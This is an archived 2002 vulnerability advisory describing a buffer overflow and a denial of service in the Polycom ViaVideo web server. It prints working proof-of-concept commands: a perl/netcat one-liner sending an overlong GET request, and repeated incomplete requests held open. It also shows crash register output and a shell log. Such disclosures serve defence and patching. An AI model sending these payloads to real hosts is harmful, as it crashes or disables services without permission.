Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: General :: web5751.htm

Polycom ViaVideo Web Component DoS and Remote Overflow



15th Oct 2002 [SBWID-5751]
COMMAND

	Polycom ViaVideo Web component DoS and remote overflow

SYSTEMS AFFECTED

	Polycom ViaVideo 2.2 Polycom ViaVideo 3.0

PROBLEM

	In prophecy (advisory @ prophecy.net.nz] advisory :
	

	 Problem #1: Buffer overflow in Polycom ViaVideo Webserver Component

	 -------------------------------------------------------------------

	

	 Proof of Concept

	 ----------------

	

	perl -e 'print "GET " . "A" x 4132 . " HTTP/1.0\r\n\r\n";' | netcat 10.1.0.1 3603

	

	Error message on host:
	

	OS: Microsoft® Windows 2000(TM) 5.0 Service Pack 3 Build 2195

	Version: Release 3.0  26Feb2002 3.0.0.144

	ViaVideo.exe caused an EXCEPTION_ACCESS_VIOLATION in module vvws.dll at 001B:67302ECE, CHttpSocket::ReadHeader()+0226 byte(s), H:\PLCMBuilds\ViaVideo\WrkSpc\VVSource\Web\WebServer\HttpSocket.cpp, line 1092+0002 byte(s)

	EAX=41414141  EBX=03D491C4  ECX=03D49190  EDX=00000001  ESI=03D49190

	EDI=03D4A1E8  EBP=03B6D3F4  ESP=0586FF1C  EIP=67302ECE  FLG=00010202

	CS=001B   DS=0023  SS=0023  ES=0023   FS=0038  GS=0000

	001B:67302ECE (0x00000000 0x00000000 0x00000000 0x00000000) vvws.dll, CHttpSocket::ReadHeader()+0226 byte(s), H:\PLCMBuilds\ViaVideo\WrkSpc\VVSource\Web\WebServer\HttpSocket.cpp, line 1092+0002 byte(s)

	

	

	

	 Problem #2: Denial-of-Service Vulnerability

	 -------------------------------------------

	

	 Proof of Concept

	 ----------------

	

	 - Open up several (4) connections to the webserver port (3603).

	 - Send any incomplete HTTP request.

	 - Leave these connections open at this point.

	 - Normal requests to the webserver will now fail.

	 - CPU utilisation on remote host (Win2k) goes to 99% for ViaVideo.exe

	

	[jonny@loki 15:21:57 ~]$ perl -e 'print "GET " . "/" . " HTTP/1.1\r\n"' | netcat 10.1.3.54 3603 &

	[5] 2140

	[jonny@loki 15:22:14 ~]$ 

	[jonny@loki 15:22:14 ~]$ jobs

	[1]   Running                 perl -e 'print "GET " . "/" . " HTTP/1.1\r\n"' | netcat 10.1.3.54 3603 &

	[2]   Running                 perl -e 'print "GET " . "/" . " HTTP/1.1\r\n"' | netcat 10.1.3.54 3603 &

	[3]   Running                 perl -e 'print "GET " . "/" . " HTTP/1.1\r\n"' | netcat 10.1.3.54 3603 &

	[4]-  Running                 perl -e 'print "GET " . "/" . " HTTP/1.1\r\n"' | netcat 10.1.3.54 3603 &

	[5]+  Running                 perl -e 'print "GET " . "/" . " HTTP/1.1\r\n"' | netcat 10.1.3.54 3603 &

	[jonny@loki 15:22:39 ~]$ 

	

SOLUTION

	A patch has been supplied by Polycom and can be downloaded at:
	

	 http://www.polycom.com/securitycenter

	


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH